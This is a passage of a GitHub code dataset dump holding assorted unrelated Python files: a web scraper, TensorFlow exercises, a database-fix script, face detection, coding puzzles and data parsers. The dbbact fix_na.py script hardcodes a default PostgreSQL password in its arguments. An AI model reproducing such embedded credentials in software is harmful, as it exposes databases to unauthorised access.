k-mers.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41561546801","text":"# -*- coding: utf-8 -*-\n\nimport scrapy\nfrom ..pdf2txt import readPDF\nimport os\n\nclass BaiInfoNews(scrapy.Spider):\n    name = 'baiinfo_news'\n\n    def start_requests(self):\n        url = 'http://www.baiinfo.com/Orders/NewsList/7704'\n        headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n                   'User-Agent': 'Mozilla/5.0 (X11; Linux 
x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n yield scrapy.Request(url, headers=headers, callback=self.parse)\n\n def parse(self, response):\n news_list = response.xpath('//div[@class=\"news_more_left\"]/ul/li')\n for news in news_list:\n title = news.xpath('a//text()').extract_first().replace('/', '-')\n url = news.xpath('a/@href').extract_first()\n publish_date = news.xpath('span/text()').extract_first()\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n if 'Orders' in url:\n url = 'http://www.baiinfo.com' + url\n yield scrapy.Request(url,\n headers=headers,\n meta={'title': title, 'publish_date': publish_date},\n callback=self.detail_parse)\n\n page_info = response.xpath('//div[@class=\"news_tel_4\"]/ul/div/a')\n for curr in page_info:\n page_indentify = curr.xpath('text()').extract_first()\n if page_indentify == '下一页':\n next_page = 'http://www.baiinfo.com' + curr.xpath('@href').extract_first()\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n yield scrapy.Request(next_page, headers=headers, callback=self.parse)\n\n def detail_parse(self, response):\n title = response.meta['title']\n publish_date = response.meta['publish_date']\n file_dir = self.path + '/' + publish_date\n self.logger.info(publish_date)\n self.logger.info(title)\n\n file_path = self.path + '/' + publish_date + '/' + title # no include extention\n if not os.path.exists(file_dir):\n os.makedirs(file_dir)\n content = ''.join(response.xpath('//ul[@class=\"news_tel_z\"]//text()').extract())\n if '点击下载' in content:\n pdf_url = response.xpath('//ul[@class=\"news_tel_z\"]/div[@class=\"news_tex\"]//a/@href').extract_first()\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n yield scrapy.Request(pdf_url, headers=headers, meta={'file_path': file_path}, callback=self.downloads)\n else:\n with open(file_path+'.txt', 'w') as f:\n f.write(content)\n\n def downloads(self, response):\n file_path = response.meta['file_path']\n with open(file_path+'.pdf', 'wb') as f:\n f.write(response.body)\n ret = readPDF(file_path+'.pdf')\n","repo_name":"csyezheng/web-scraping-examples","sub_path":"baiinfo_news/baiinfo_news/spiders/baiinfo_news.py","file_name":"baiinfo_news.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"15972225091","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\n'''\n\n#Central to TF is tensors. Primitive values shaped into an array. Rank is dimensions. 
Shape is tuple of ints specifying arrays length\n#numpy arrays represent tensors\n\n#The TF core is the computational graph and running it in a session\n\n# Graphs have Operations representing nodes, and tensors as edges\n\na = tf.constant(3.0, dtype=tf.float32)\nb = tf.constant(4.0) # also tf.float32 implicitly\ntotal = a + b\n\nprint(a)\nprint(b)\nprint(total)\n\n\n\n#The above outputs the computational graph, each with a unique name. Not values.\n\n\n# evaluation requires creating a tf.Session object.\n\nsess = tf.Session()\nprint(sess.run(total))\n\nprint(sess.run({'ab':(a, b), 'total':total}))\n\nvec = tf.random_uniform(shape=(3,))\nout1 = vec + 1\nout2 = vec + 2\nprint(sess.run(vec))\nprint(sess.run(vec))\nprint(sess.run((out1, out2)))\n\n# A ML graph needs variable result. Placeholders are designed to hold future values\nx = tf.placeholder(tf.float32)\ny = tf.placeholder(tf.float32)\nz = x + y\n\nprint(sess.run(z, feed_dict={x: 3, y: 4.5}))\nprint(sess.run(z, feed_dict={x: [1, 3], y: [2, 4]}))\n\n#Datasets are however the preffered way of working with models\n\nmy_data = [\n [0, 1,],\n [2, 3,],\n [4, 5,],\n [6, 7,],\n]\nslices = tf.data.Dataset.from_tensor_slices(my_data)\nnext_item = slices.make_one_shot_iterator().get_next()\n\nwhile True:\n try:\n print(sess.run(next_item))\n except tf.errors.OutOfRangeError:\n break\n\n#If statefull the itterator may need to initialized\n\nr = tf.random_normal([10,3])\ndataset = tf.data.Dataset.from_tensor_slices(r)\niterator = dataset.make_initializable_iterator()\nnext_row = iterator.get_next()\n\nsess.run(iterator.initializer)\nwhile True:\n try:\n print(sess.run(next_row))\n except tf.errors.OutOfRangeError:\n break\n\n#Trainable models need values to to be modified in the graph to reach now outputs with same inputs.\n# Layers are used and package variables and opperations together.\n# A denseely-connected layer applies an opitonal activation on the output to all functions inputs\n\nx = tf.placeholder(tf.float32, shape=[None, 3])\nlinear_model = tf.layers.Dense(units=1)\ny = linear_model(x)\n\n#Initializing the layers resulting variables\ninit = tf.global_variables_initializer()\nsess.run(init)\n\n#Now we can evaluate the linear model's output tensors as any otherself.\n\nprint(sess.run(y, {x: [[1, 2, 3],[4, 5, 6]]}))\n\n# Condensed removing access to the linear model layer\nx = tf.placeholder(tf.float32, shape=[None, 3])\ny = tf.layers.dense(x, units=1)\ninit = tf.global_variables_initializer()\nsess.run(init)\nprint(sess.run(y, {x: [[1, 2, 3], [4, 5, 6]]}))\n\n# Feature columns are easiest done with tf.feature_column.input_layer and only accepts dense columnsself.\n# Viewing requires a wrapper of indicator_column\n\nfeatures = {\n 'sales' : [[5], [10], [8], [9]],\n 'department': ['sports', 'sports', 'gardening', 'gardening']}\n\ndepartment_column = tf.feature_column.categorical_column_with_vocabulary_list(\n 'department', ['sports', 'gardening'])\ndepartment_column = tf.feature_column.indicator_column(department_column)\n\ncolumns = [\n tf.feature_column.numeric_column('sales'),\n department_column\n]\n\ninputs = tf.feature_column.input_layer(features, columns)\n\n#Feature columns have an internal state like layers and require initializationself.\n# Categorical columns use lookup tables requiring a different intiialization, tf.tables_initializer\n\nvar_init = tf.global_variables_initializer()\ntable_init = tf.tables_initializer()\nsess = tf.Session()\nsess.run((var_init, table_init))\n\n# once sess initializes. 
Run\nprint(sess.run(inputs))\n\n\n# Training\n# Some arbritrary inputs\nx = tf.constant([[1], [2], [3], [4]], dtype=tf.float32, name=\"C1\")\ny_true = tf.constant([[0], [-1], [-2], [-3]], dtype=tf.float32, name=\"C2\")\n\n#The training model with one outputs\nlinear_model = tf.layers.Dense(units=1, name=\"L1\")\ny_pred = linear_model(x)\nsess = tf.Session()\ninit = tf.global_variables_initializer()\nsess.run(init)\nprint(sess.run(y_pred))\n\n# Loss to train\nloss = tf.losses.mean_squared_error(labels=y_true, predictions=y_pred)\nprint(sess.run(loss))\n\n#Optimizers test the loss\noptimizer = tf.train.GradientDescentOptimizer(0.01)\ntrain = optimizer.minimize(loss)\n\n#itterative training\nfor i in range(100):\n _, loss_value = sess.run((train, loss))\n print(loss_value)\n\n'''\n\n\n\n#Completed:\n\n#The input values\nx = tf.constant([[4], [3], [2], [1]], dtype=tf.float32, name=\"X\")\n#The comparison values\ny_true = tf.constant([[0], [-1], [-2], [-3]], dtype=tf.float32, name=\"Y_t\")\n#A dense LM\nlinear_model = tf.layers.Dense(units=1, name=\"Dense_LM\")\n'''Dense layer y_pred that takes a batch of input vectors,'''\n#assinged to y_predictions\ny_pred = linear_model(x)\n#With loss operations based on y_true labels and predictions dictated by the model\nloss = tf.losses.mean_squared_error(labels=y_true, predictions=y_pred)\n'''y_pred produces a single output and MSE judges it'''\n\n#Set up the basic trainer to minimize loss\noptimizer = tf.train.GradientDescentOptimizer(0.01, name=\"gdo\")\ntrain = optimizer.minimize(loss)\n\n#set internal states\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\n#Train n times outputting a blank and the loss value.\n#Put the training function and loss function into the run function.\nfor i in range(10000):\n _, loss_value = sess.run((train, loss))\n print(loss_value)\n\n#Run the variables through the prediction model\nprint(sess.run(y_pred))\n\n\n\n\n\n#TensorBoard is a way to viusalize the graphself.\nwriter = tf.summary.FileWriter('.')\nwriter.add_graph(tf.get_default_graph())\n\n# Go into the directory and type `tensorboard --logdir .` to view your graph\n\n\ninput()\n","repo_name":"ECHibiki/TesnorFlow-Exercises","sub_path":"Tensorflow Examples/TF low level.py","file_name":"TF low level.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10706265044","text":"#!/usr/bin/env python\n\n'''Update the OntologyTreeStructureTable to fix the old na root term (which was undefined as contained many optional NAs)\n'''\n\nimport sys\n\nimport argparse\nimport re\nfrom collections import defaultdict\n\nimport oboparse\nimport psycopg2\n\nfrom dbbact_server import db_access\nfrom dbbact_server.utils import debug, SetDebugLevel\n\n__version__ = \"0.1\"\n\n\ndef fix_na(con, cur, commit=False):\n\t'''Update the OntologyTreeStructureTable to fix the old na root term (which was undefined as contained many optional NAs)\n\n\tParameters\n\t----------\n\tcon, cur: dbbact psycopg2 database connection and cursor\n\tcommit: bool, optional\n\t\tTrue to commit changes, False to just perform dry run\n\t'''\n\t# find the id of the dbbact ontology\n\tcur.execute('SELECT * FROM ontologynamestable WHERE description=%s', ['dbbact'])\n\tres = cur.fetchone()\n\tontologynameid = res['id']\n\tif ontologynameid != 8:\n\t\traise ValueError('strange dbbact ontologynameid: %s (instead of 8)' % ontologynameid)\n\n\t# find the dbbact root term id \"dbbact 
root\" (id 1811274)\n\tcur.execute('SELECT * from OntologyTable WHERE description=%s', ['dbbact root'])\n\tres = cur.fetchone()\n\tif res['term_id'] != 'dbbact:1811274':\n\t\traise ValueError('\"dbbact root\" term_id is %s instead of dbbact:1811274' % res['term_id'])\n\troot_id = res['id']\n\n\tcur.execute('SELECT * FROM OntologyTable WHERE term_id LIKE %s', ['dbbact:%'])\n\tdebug(3, 'Found %d dbbact terms' % cur.rowcount)\n\tres = cur.fetchall()\n\tnum_na_parents = 0\n\tfor cres in res:\n\t\tcur.execute('SELECT * FROM OntologyTreeStructureTable WHERE ontologyid=%s', [cres['id']])\n\t\ttres = cur.fetchall()\n\t\tfor ctres in tres:\n\t\t\tcur.execute('SELECT * FROM OntologyTable WHERE id=%s LIMIT 1', [ctres['ontologyparentid']])\n\t\t\tif cur.rowcount == 0:\n\t\t\t\tcontinue\n\t\t\tttres = cur.fetchone()\n\t\t\tif ttres['description'] == 'na':\n\t\t\t\tcur.execute('UPDATE OntologyTreeStructureTable SET ontologyparentid=%s, ontologynameid=%s WHERE uniqueid=%s', [root_id, ontologynameid, ctres['uniqueid']])\n\t\t\t\tnum_na_parents += 1\n\tdebug(4, 'updating %d dbbact terms roots' % num_na_parents)\n\tif commit:\n\t\tcon.commit()\n\t\tdebug(3, 'commited')\n\tdebug(3, 'done')\n\n\ndef main(argv):\n\tparser = argparse.ArgumentParser(description='Update the OntologyTreeStructureTable to fix the old na root term (which was undefined as contained many optional NAs). version ' + __version__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument('--port', help='postgres port', default=5432, type=int)\n\tparser.add_argument('--host', help='postgres host', default=None)\n\tparser.add_argument('--database', help='postgres database', default='dbbact')\n\tparser.add_argument('--user', help='postgres user', default='dbbact')\n\tparser.add_argument('--password', help='postgres password', default='magNiv')\n\tparser.add_argument('--debug-level', help='debug level (1 for debug ... 
9 for critical)', default=2, type=int)\n\tparser.add_argument('--dry-run', help='do not commit', action='store_true')\n\targs = parser.parse_args(argv)\n\n\tSetDebugLevel(args.debug_level)\n\n\tcon, cur = db_access.connect_db(database=args.database, user=args.user, password=args.password, port=args.port, host=args.host)\n\tfix_na(con, cur, commit=not args.dry_run)\n\n\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])\n","repo_name":"amnona/dbbact-server","sub_path":"utils/fix_na.py","file_name":"fix_na.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14964661386","text":"#googleimagesdownload -k \"\" -l 20\n\n\nimport cv2\nimport os\nimport shutil\n\norg_dir = \"dataset/01_org/\"\nface_dir = \"dataset/02_face/\"\n\ncascade_xml = \"haarcascade_frontalface_default.xml\"\n\n\ndef main():\n    name_list = [filename for filename in os.listdir(org_dir) if not filename.startswith(\".\")]\n    print(name_list)\n    \n\n    for name in name_list:\n        name = name.replace(\" \", \"_\")  # str.replace returns a new string; the result was being discarded\n        org_char_dir = org_dir + name + \"/\"\n        print(org_char_dir)\n\n        face_char_dir = face_dir + name + \"/\"\n        os.makedirs(face_char_dir, exist_ok=True)\n\n        print(len(face_char_dir))\n\n        detect_face(org_char_dir, face_char_dir)\n\ndef detect_face(org_char_dir, face_char_dir):\n    image_list = os.listdir(org_char_dir)\n\n    for image_file in image_list:\n        \n        org_image = cv2.imread(org_char_dir + image_file)\n\n        if org_image is None:\n            print(\"Not open:\", image_file)\n            continue\n\n        #convert gray_scale\n        img_gs = cv2.cvtColor(org_image, cv2.COLOR_BGR2GRAY)\n        \n        #detect_face\n        cascade = cv2.CascadeClassifier(cascade_xml)\n\n        face_image = None  # guard so nothing is saved when no face was found\n        for i_mn in range(1, 7, 1):\n            face_list = cascade.detectMultiScale(img_gs, scaleFactor=1.1, minNeighbors=i_mn, minSize=(200, 200))\n            #if more than one_face detected, get image (64*64)\n            if len(face_list ) > 0:\n                for rect in face_list:\n                    image = org_image[rect[1]:rect[1]+rect[3], rect[0]:rect[0]+rect[2]]\n                    if image.shape[0] < 64 or image.shape[1] < 64:\n                        continue\n                    face_image = cv2.resize(image, (64, 64))\n\n            else:\n                continue\n        \n\n        #save face_image\n        if face_image is None:\n            continue\n        face_file_name = os.path.join(face_char_dir, \"face-\" + image_file)\n        cv2.imwrite(str(face_file_name), face_image)\n\nif __name__ == \"__main__\":\n    main()\n\n\n\n\n\n\n    ","repo_name":"priekosukeyauchi/face_classification","sub_path":"02_face_detection.py","file_name":"02_face_detection.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1320879076","text":"# Given an array nums of distinct integers, return all the possible permutations. 
You can return the answer in any order.\n\n\ndef backtracking(nums, arr, answers):\n if len(nums) == 0: \n answers.append(list(arr)) \n\n for i in range(0 , len(nums)):\n arr.append(nums[i])\n backtracking(nums[:i] + nums[i+1:], arr, answers) \n arr.pop() \n\ndef permute(nums):\n if len(nums) == 0:\n return answers\n \n arr = list()\n answers = list()\n\n backtracking(nums, arr, answers)\n \n return answers\n\n\nprint(permute([1,2,3])) # Output: [[1,2,3],[1,3,2],[2,1,3],[2,3,1],[3,1,2],[3,2,1]]\nprint(permute([0,1])) # Output: [[0,1],[1,0]]\nprint(permute([1])) # Output: [[1]]","repo_name":"YaraHorany/Programming-Challenges","sub_path":"Permutations.py","file_name":"Permutations.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25363969960","text":"import pickle\nimport numpy as np\nimport random\n\n\n# Load the trained model from the pickle file\nwith open(\"C:/Users/habibars/Downloads/Network monitoring/intrusion_detection/random_forest_model.pkl\", 'rb') as f:\n model = pickle.load(f)\n\n# Define the infer method\ndef infer(data):\n \n # Reshape the data to ensure it has the correct shape\n data = np.reshape(data, (1, -1))\n\n # Use the trained model to make a prediction on the input data\n prediction = model.predict(data)\n\n # Return the predicted class (e.g. \"BENIGN\" or \"Attack\")\n return prediction[0]\n\n\nif __name__ == '__main__':\n # Note: Only take input when you run the file individually \n # Generate a list of 69 random numbers between 0 and 1\n data = [random.uniform(0, 1) for _ in range(69)]\n\n prediction = infer(data)\n print(prediction)\n\n# Note: Command to run the file \"python inference.py\"\n\n\n","repo_name":"arsalanhabib01/Random-forest-model","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20272784497","text":"import src.grpc.pb.message_pb2 as message_pb2\nfrom src.logic.handler import MessageHandler\nfrom src.logic.message_queue import MessageQueue\nfrom src.wit.wit import send_text\nimport src.grpc.pb.message_pb2_grpc as message_pb2_grpc\n\n\nclass MessageServicer(message_pb2_grpc.MessageServicer):\n\n def SingleRequest(self, request, context):\n wit_response = send_text(request.body)\n try:\n response = MessageHandler(wit_response, request.client_type).handle_message()\n except Exception as e:\n print(e)\n return message_pb2.Success(success=False)\n MessageQueue.add(response, request.client_type)\n return message_pb2.Success(success=True)\n\n def StreamRequest(self, request_iterator, context):\n while True:\n while MessageQueue.get_length() > 0:\n response, client_type = MessageQueue.get_first()\n yield message_pb2.MessageResponse(body=response.text, client_type=client_type)\n","repo_name":"nloetkemann/Lilly","sub_path":"Server/src/grpc/message_service.py","file_name":"message_service.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37331005416","text":"books = [\"Learn You a Haskell\", \n \"The Healthy Programmer\",\n \"Code Complete\",\n \"The Pragmatic Programmer\",\n \"Pro Git\",\n \"Introduction to Algorithms\",\n \"Concrete Mathematics\"]\nindex = 0\n\nwhile index < len(books):\n\tprint(books[index])\n\tindex += 
1","repo_name":"presian/HackBulgaria","sub_path":"Programming0-1/Week_2/2-List-Problems/while_traverse.py","file_name":"while_traverse.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9863334712","text":"import numpy as np\nfrom wave_1d_fd_pml.propagators import Pml2\n\nclass Rtm(object):\n def __init__(self, dx, dt=None, pml_width=10, profile=None):\n self.dx = dx\n self.dt = dt\n self.pml_width = pml_width\n self.profile = profile\n\n def migrate_shot(self, model, source, source_x, receivers, receivers_x,\n imaging_condition_interval=1, ):\n assert source.ndim == 1\n assert receivers.ndim == 2\n source = source[np.newaxis, :]\n source_x = np.array([source_x])\n num_imaging_steps = int((receivers.shape[1] - 1) / imaging_condition_interval)\n\n prop = Pml2(model, self.dx, self.dt, self.pml_width, self.profile)\n nx = len(model)\n\n source_snapshots = self._forward_source(source, source_x,\n imaging_condition_interval,\n num_imaging_steps, prop, nx)\n\n image = self._backward_receivers(receivers, receivers_x,\n imaging_condition_interval,\n num_imaging_steps,\n source_snapshots, prop, nx)\n\n return image\n\n def _forward_source(self, source, source_x,\n imaging_condition_interval,\n num_imaging_steps, prop, nx):\n\n source_snapshots = np.zeros([num_imaging_steps, nx], np.float32)\n for imaging_step in range(0, num_imaging_steps):\n start_time_step = imaging_step * imaging_condition_interval\n end_time_step = start_time_step + imaging_condition_interval\n if end_time_step < source.shape[1]:\n source_snapshots[imaging_step, :] = \\\n prop.step(imaging_condition_interval,\n source[:, start_time_step:end_time_step],\n source_x)\n elif start_time_step < source.shape[1]:\n remaining_source_steps = source.shape[1] - start_time_step\n steps_after_source = (imaging_condition_interval -\n remaining_source_steps)\n prop.step(remaining_source_steps,\n source[:, start_time_step:],\n source_x)\n source_snapshots[imaging_step, :] = \\\n prop.step(steps_after_source)\n else:\n source_snapshots[imaging_step, :] = \\\n prop.step(imaging_condition_interval)\n\n return source_snapshots\n\n def _backward_receivers(self, receivers, receivers_x,\n imaging_condition_interval,\n num_imaging_steps,\n source_snapshots, prop, nx):\n\n image = np.zeros([nx], np.float32)\n for imaging_step in range(num_imaging_steps - 1, -1, -1):\n start_time_step = (imaging_step + 2) * imaging_condition_interval - 1\n end_time_step = start_time_step - imaging_condition_interval\n if start_time_step >= receivers.shape[1]:\n start_time_step = receivers.shape[1] - 1\n receiver_snapshot = \\\n prop.step(start_time_step - end_time_step,\n receivers[:, start_time_step:end_time_step:-1],\n receivers_x)\n image += (source_snapshots[imaging_step, :] *\n receiver_snapshot[:] * imaging_condition_interval)\n\n return image\n\n def model_shot(self, model, source, source_x, receivers_x, max_time):\n assert source.ndim == 1\n source = source[np.newaxis, :]\n source_x = np.array([source_x])\n num_receivers = len(receivers_x)\n\n prop = Pml2(model, self.dx, self.dt, self.pml_width, self.profile)\n\n nt = int(max_time / self.dt)\n receivers = np.zeros([num_receivers, nt], np.float32)\n for step in range(nt):\n wavefield = prop.step(1,\n source[:, step:step+1],\n source_x)\n receivers[:, step] = wavefield[receivers_x]\n\n return 
receivers\n","repo_name":"ar4/rtm_1d","sub_path":"rtm_1d/rtm.py","file_name":"rtm.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40052292714","text":"import sys\nimport datetime\nimport pandas as pd\nfrom scipy import stats\n\ndef calc_zscore(df, name):\n try:\n zscore = stats.zscore(df.iloc[:, 1])\n df[5] = zscore\n except TypeError:\n print(\"TypeError: \" + name)\n return df\n\ndef add_zcore(filename):\n try:\n df = pd.read_table(filename, header=None)\n scored_df = calc_zscore(df, filename)\n scored_df.to_csv(filename, header=None, index=None, sep=\"\\t\")\n except pd.errors.ParserError:\n print(\"ParseError: \" + filename)\n\ndef main(args):\n try:\n yyyymmdd = args.pop(1)\n if yyyymmdd == \"today\":\n yyyymmdd = datetime.date.today().strftime('%Y%m%d')\n except IndexError:\n d = datetime.date.today() - datetime.timedelta(days=1)\n yyyymmdd = d.strftime('%Y%m%d')\n\n filename = \"/home/fluent/.fluent/log/hotnews_\" + yyyymmdd + \".txt\"\n add_zcore(filename)\n\nif __name__ == '__main__':\n argsmin = 0\n version = (3, 0)\n if sys.version_info > (version):\n if len(sys.argv) > argsmin:\n sys.exit(main(sys.argv))\n else:\n print(\"This program needs at least %(argsmin)s arguments\" %\n locals())\n else:\n print(\"This program requires python > %(version)s\" % locals())\n","repo_name":"id774/hotnews","sub_path":"zscore_daily.py","file_name":"zscore_daily.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20594812551","text":"# https://leetcode.com/problems/roman-to-integer/\n# Input: s = \"MCMXCIV\"\n# Output: 1994\n# Explanation: M = 1000, CM = 900, XC = 90 and IV = 4.\n\n# Symbol Value\n# I 1\n# V 5\n# X 10\n# L 50\n# C 100\n# D 500\n# M 1000\n\n\nclass Solution:\n\n\n def romanToInt(self, s: str) -> int:\n rule_add = {\n 'I': 1,\n 'V': 5,\n 'X': 10,\n 'L': 50,\n 'C': 100,\n 'D': 500,\n 'M': 1000\n }\n\n rule_div = {\n ('I', 'V'): 3,\n ('I', 'X'): 8,\n ('X', 'L'): 30,\n ('X', 'C'): 80,\n ('C', 'D'): 300,\n ('C', 'M'): 800\n }\n number = 0\n prev_l = None\n for l in s:\n if prev_l and rule_add[l] > rule_add[prev_l]:\n number += rule_div[(prev_l, l)]\n print(number)\n else:\n number += rule_add[l]\n print(number)\n prev_l = l\n return number\n\n\nif __name__ == '__main__':\n s = 'MCMXCIV'\n print(Solution().romanToInt(s))\n\n","repo_name":"yention/codewar","sub_path":"leetcode/RomanToInt.py","file_name":"RomanToInt.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"349791859","text":"import json\n\n# entire database class with all the functions\nclass MyDb:\n def __init__(self, dbName):\n self.fileName = dbName + \".json\"\n self.json = self.loadDatabase()\n self.collection = \"\"\n def loadDatabase(self):\n with open(self.fileName) as file:\n return json.load(file)\n\n def saveDatabase(self):\n with open(self.fileName, \"w\") as file:\n file.write(json.dumps(self.json, indent=4)) \n\n def changeCollection(self, nameOfCol):\n try:\n self.json[nameOfCol]\n except KeyError:\n print(\"This collection is not in database, preparing collection.\")\n self.json[nameOfCol] = []\n \n self.collection = nameOfCol\n def getAll(self):\n return self.json[self.collection]\n def find(self, query):\n key = list(query.keys())[0]\n for obj in self.json[self.collection]:\n if 
obj[key] == query[key]:\n return obj\n\n def create(self, obj):\n highestId = 0\n for user in self.json[self.collection]:\n if user[\"id\"] >= highestId:\n highestId = user[\"id\"] \n highestId += 1\n obj[\"id\"] = highestId\n self.json[self.collection].append(obj)\n self.saveDatabase()\n return obj\n \n def delete(self, query):\n key = list(query.keys())[0]\n for obj in self.json[self.collection]:\n if obj[key] == query[key]:\n self.json[self.collection].remove(obj)\n self.saveDatabase()\n return True \n return False\n\n def update(self, query, updateObj):\n queryKey = list(query.keys())[0]\n updateKey = list(updateObj.keys())[0]\n for obj in self.json[self.collection]:\n if obj[queryKey] == query[queryKey]:\n obj[updateKey] = updateObj[updateKey]\n self.saveDatabase()\n return obj \n return False\n\ndef main():\n db = MyDb(\"users\")\n db.changeCollection(\"prizemi\")\n name = input(\"Name: \")\n print(db.getAll())\n user = db.create({\"name\": name})\n print(db.getAll())\n\nif __name__ == '__main__':\n main() \n","repo_name":"HollowFalls/retirement-product","sub_path":"myPyDb.py","file_name":"myPyDb.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10773477298","text":"import os\nimport subprocess\nimport tempfile\nfrom pprint import pformat\nfrom src.cpp_builder import CPPBuilder, compile_cpp_module\n\n\ndef get_test_stdout(root_node, compile_only=False):\n source_path = tempfile.mktemp(dir=\"/tmp\", prefix=\"drake_test\", suffix=\".cpp\")\n header_path = source_path.replace('.cpp', '.hpp')\n exe_path = source_path.replace('.cpp', '')\n\n with CPPBuilder(c=source_path, h=header_path) as builder:\n root_node.to_cpp(builder)\n\n print(\"\\nCPP header file:\\n\", open(header_path).read())\n print(\"\\nCPP source file:\\n\", open(source_path).read())\n\n compile_cpp_module([ source_path ], exe_path)\n\n if compile_only:\n return None\n\n output = subprocess.check_output(exe_path)\n output = output.decode('utf-8').strip()\n\n return output\n","repo_name":"programWhiz/drake","sub_path":"tests/test_hl_ast/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2746996203","text":"# main.py\nfrom collections import namedtuple\nfrom datetime import datetime\nfrom functools import partial\nfrom collections import defaultdict\n\n\nfile_name = './nyc_parking_tickets_extract.csv'\n\nwith open(file_name) as f:\n column_headers = next(f).strip('\\n').split(',')\n sample_data = next(f).strip('\\n').split(',')\n\nprint(column_headers)\nprint(sample_data)\n\ncolumn_names = [header.replace(' ','_').lower() for header in column_headers]\nprint(column_names)\nprint(list(zip(column_names, sample_data)))\nTicket = namedtuple('Ticket',column_names)\n\n# with open(file_name) as f:\n# next(f)\n# raw_data_row = next(f)\n#\n#\n# print([raw_data_row])\ndef read_data():\n with open(file_name) as f:\n next(f)\n yield from f\nraw_data = read_data()\n\ndef parse_int(value, *, default=None):\n try:\n return int(value)\n except ValueError:\n return default\n\n\n# print(parse_int('test', default='not an interger'))\n#\n# print(parse_int(10, default='not an integer'))\n\ndef parse_date(value, *, default=None):\n date_format = '%m/%d/%Y'\n try:\n return datetime.strptime(value, date_format).date()\n except ValueError:\n return default\n\n\n# print(parse_int('hello', default='N/A'))\n# 
print(parse_date('3/28/2018'))\n# print(parse_date('231212', default='N/A'))\n\ndef parse_string(value, *, default=None):\n try:\n cleaned = value.strip()\n if not cleaned:\n return default\n else:\n return cleaned\n except ValueError:\n return default\n\n\n# print(parse_string(' helllo '))\n# print(parse_string(' ', default='N/A'))\n\ncolumn_parsers = (parse_int,\n parse_string,\n lambda x: parse_string(x, default=''),\n partial(parse_string, default=''),\n parse_date,\n parse_int,\n partial(parse_string, default=''),\n parse_string,\n lambda x: parse_string(x, default='')\n )\n\n\ndef parse_row(row, *, default=None):\n fields = row.strip('\\n').split(',')\n parsed_data = [func(field)\n for func, field in zip(column_parsers, fields)]\n # return parsed_data\n if all(item is not None for item in parsed_data):\n return Ticket(*parsed_data)\n else:\n return default\nrows = read_data()\n\n\nprint('-------')\nfor _ in range(5):\n row = next(rows)\n parsed_data = parse_row(row)\n print(parsed_data)\n\n\nfor row in read_data():\n parsed_row = parse_row(row)\n if parsed_row is None:\n print(list(zip(column_names, row.strip('\\n').split(','))), end='\\n\\n')\n\n\ndef parsed_data():\n for row in read_data():\n parsed = parse_row(row)\n if parsed:\n yield parsed\nparsed_rows = parsed_data()\n\n\n# for _ in range(5):\n# print(next(parsed_rows))\n\n\ndef violation_count_by_make():\n makes_counts = defaultdict(int)\n for data in parsed_data():\n makes_counts[data.vehicle_make] += 1\n\n return {make: cnt\n for make, cnt in sorted(makes_counts.items(),\n key=lambda t: t[1],\n reverse=True)}\n\n\nprint(violation_count_by_make())","repo_name":"elmi-elmi/dD-pr6-demo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6106144375","text":"import discord\r\nimport time\r\nimport 